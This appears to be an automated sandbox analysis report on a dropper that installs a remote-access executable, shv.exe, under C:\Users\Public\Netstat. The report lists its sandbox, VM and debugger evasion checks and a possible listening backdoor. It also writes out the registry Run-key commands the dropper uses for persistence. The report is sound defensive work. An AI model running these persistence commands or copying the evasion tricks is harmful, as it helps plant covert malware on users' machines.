Source: C:\Users\Public\Netstat\shv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1C91F0		6_2_6D1C91F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1D4F30		6_2_6D1D4F30

Delayed program exit found

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110B8200 Sleep,ExitProcess,		6_2_110B8200
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110B8200 Sleep,ExitProcess,		9_2_110B8200

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Netstat\shv.exe

Window / User API: threadDelayed 938

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe	Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\Users\Public\Netstat\shv.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Netstat\shv.exe	Evasive API call chain: GetLocalTime,DecisionNodes

Found evasive API chain checking for process token information

Source: C:\Users\Public\Netstat\shv.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\Public\Netstat\shv.exe	API coverage: 6.2 %
Source: C:\Users\Public\Netstat\shv.exe	API coverage: 2.6 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D4F30

6_2_6D1D4F30

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Netstat\shv.exe TID: 1012

Thread sleep time: -93800s >= -30000s

Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\Public\Netstat\shv.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Netstat\shv.exe	Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6D1D3226h

6_2_6D1D3130

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,	0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	9_2_1110AFD0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B16A4 VirtualQuery,GetSystemInfo,

0_2_00007FF70E7B16A4

Source: shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla m*
Source: HTCTL32.DLL.0.dr	Binary or memory string: VMware
Source: HTCTL32.DLL.0.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: HTCTL32.DLL.0.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: shv.exe, 00000006.00000002.3994135214.000000000127E000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995636739.0000000005F06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.0.dr	Binary or memory string: VMWare
Source: shv.exe, 00000009.00000002.2162978734.0000000001490000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000009.00000003.2162115523.000000000148D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: shv.exe, 0000000B.00000003.2263461175.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000D.00000003.2349439155.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000E.00000003.2430757165.00000000010C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF70E7B76D8

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,

6_2_11147750

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Netstat\shv.exe

6_2_11029590

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7C0D20 GetProcessHeap,

0_2_00007FF70E7C0D20

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF70E7B76D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B3354 SetUnhandledExceptionFilter,	0_2_00007FF70E7B3354
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF70E7B2510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF70E7B3170
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	6_2_11093080
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	6_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1116DD89
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1E28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6D1E28E1
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	9_2_11093080
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	9_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_1116DD89

Contains functionality to execute programs as a different user

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,

6_2_110F4560

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF70E7AB190

Contains functionality to simulate keystroke presses

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,

6_2_1111FCA0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

6_2_1109E190

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

6_2_1109E910

Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWnd
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Progman

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E79DC70 cpuid

0_2_00007FF70E79DC70

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_00007FF70E7AA2CC
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173CC6
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	6_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_11173933
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_6D1F1DB6
Source: C:\Users\Public\Netstat\shv.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_6D1FDC56
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	6_2_6D1FDC99
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_6D1F1CC1
Source: C:\Users\Public\Netstat\shv.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_6D1F0F39
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_6D1F1E5D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_6D1F1EB8
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_6D1FDB7C
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	9_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	9_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	9_2_11173933
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	9_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	9_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	9_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_11173CC6

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

6_2_110F33F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF70E7B0754

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,

6_2_1103B160

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

6_2_11174AE9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E794EB0 GetVersionExW,

0_2_00007FF70E794EB0

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	6_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	6_2_110D8200
